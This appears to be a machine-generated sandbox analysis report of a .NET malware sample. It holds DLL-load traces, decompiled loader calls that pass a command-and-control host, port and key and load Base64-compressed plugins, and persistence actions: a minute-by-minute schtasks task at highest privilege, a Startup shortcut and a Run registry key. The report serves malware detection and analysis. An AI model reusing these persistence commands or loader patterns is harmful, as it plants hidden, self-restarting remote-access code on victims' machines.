                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: apphelp.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: sspicli.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: cryptsp.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: rsaenh.dll
                            Source: C:\Users\user\AppData\Local\Temp\system logSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: policymanager.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: msvcp110_win.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: kernel.appcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uxtheme.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecoreuapcommonproxystub.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.storage.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wldp.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinui.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: wintypes.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: powrprof.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwmapi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: pdh.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: umpdc.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: onecorecommonproxystub.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: actxprxy.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: propsys.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: profapi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.staterepositoryps.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.appdefaults.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.immersive.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: ntmarta.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uiautomationcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dui70.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: duser.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dwrite.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: bcp47mrm.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: uianimation.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d11.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxgi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: d3d10warp.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: resourcepolicyclient.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dxcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: dcomp.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: oleacc.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: edputil.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windows.ui.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowmanagementapi.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textinputframework.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: inputhost.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: twinapi.appcore.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coremessaging.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: coreuicomponents.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: windowscodecs.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: thumbcache.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: sxs.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: directmanipulation.dll
                            Source: C:\Windows\System32\OpenWith.exeSection loaded: textshaping.dll
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: system log.lnk.0.drLNK file: ..\..\..\..\..\..\Local\Temp\system log
                            Source: Window RecorderWindow detected: More than 3 window changes detected
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: kj93GnZHBS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                            Source: kj93GnZHBS.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                            Data Obfuscation

                            barindex
                            Source: kj93GnZHBS.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: kj93GnZHBS.exe, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: system log.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: system log.0.dr, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
                            Source: kj93GnZHBS.exe, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: kj93GnZHBS.exe, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: kj93GnZHBS.exe, Messages.cs.Net Code: Memory
                            Source: system log.0.dr, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
                            Source: system log.0.dr, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
                            Source: system log.0.dr, Messages.cs.Net Code: Memory
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E6867C push eax; ret 0_2_00007FF848E6867B
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E68648 push eax; ret 0_2_00007FF848E6867B
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E685FD push eax; ret 0_2_00007FF848E6867B
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E600BD pushad ; iretd 0_2_00007FF848E600C1
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeCode function: 0_2_00007FF848E67C2D push E95D8FC9h; ret 0_2_00007FF848E67C79
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848D5D2A5 pushad ; iretd 2_2_00007FF848D5D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848E700BD pushad ; iretd 2_2_00007FF848E700C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F40835 pushfd ; retf 2_2_00007FF848F40837
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F42316 push 8B485F93h; iretd 2_2_00007FF848F4231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF848F42185 pushfd ; retf 2_2_00007FF848F42187
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848D4D2A5 pushad ; iretd 5_2_00007FF848D4D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848E600BD pushad ; iretd 5_2_00007FF848E600C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F30835 pushfd ; retf 5_2_00007FF848F30837
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F32316 push 8B485F94h; iretd 5_2_00007FF848F3231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F32185 pushfd ; retf 5_2_00007FF848F32187
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_00007FF848F333D5 pushfd ; retf 5_2_00007FF848F333D7
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848D5D2A5 pushad ; iretd 8_2_00007FF848D5D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848E700BD pushad ; iretd 8_2_00007FF848E700C1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F42316 push 8B485F93h; iretd 8_2_00007FF848F4231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F40835 pushfd ; retf 8_2_00007FF848F40837
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F48A38 pushad ; ret 8_2_00007FF848F48A39
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FF848F42185 pushfd ; retf 8_2_00007FF848F42187
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848D6D2A5 pushad ; iretd 10_2_00007FF848D6D2A6
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848F50835 pushfd ; retf 10_2_00007FF848F50837
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848F52316 push 8B485F92h; iretd 10_2_00007FF848F5231B
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848F52185 pushfd ; retf 10_2_00007FF848F52187
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF848F533D5 pushfd ; retf 10_2_00007FF848F533D7
                            Source: C:\Users\user\AppData\Local\Temp\system logCode function: 15_2_00007FF848E700BD pushad ; iretd 15_2_00007FF848E700C1
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeFile created: C:\Users\user\AppData\Local\Temp\system logJump to dropped file
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeFile created: C:\Users\user\AppData\Local\Temp\system logJump to dropped file

                            Boot Survival

                            barindex
                            Source: Yara matchFile source: kj93GnZHBS.exe, type: SAMPLE
                            Source: Yara matchFile source: 0.0.kj93GnZHBS.exe.410000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000000.00000000.2006908730.0000000000412000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                            Source: Yara matchFile source: Process Memory Space: kj93GnZHBS.exe PID: 728, type: MEMORYSTR
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\system log, type: DROPPED
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "system log" /tr "C:\Users\user\AppData\Local\Temp\system log"
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system log.lnkJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\system log.lnkJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run system logJump to behavior
                            Source: C:\Users\user\Desktop\kj93GnZHBS.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run system logJump to behavior

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
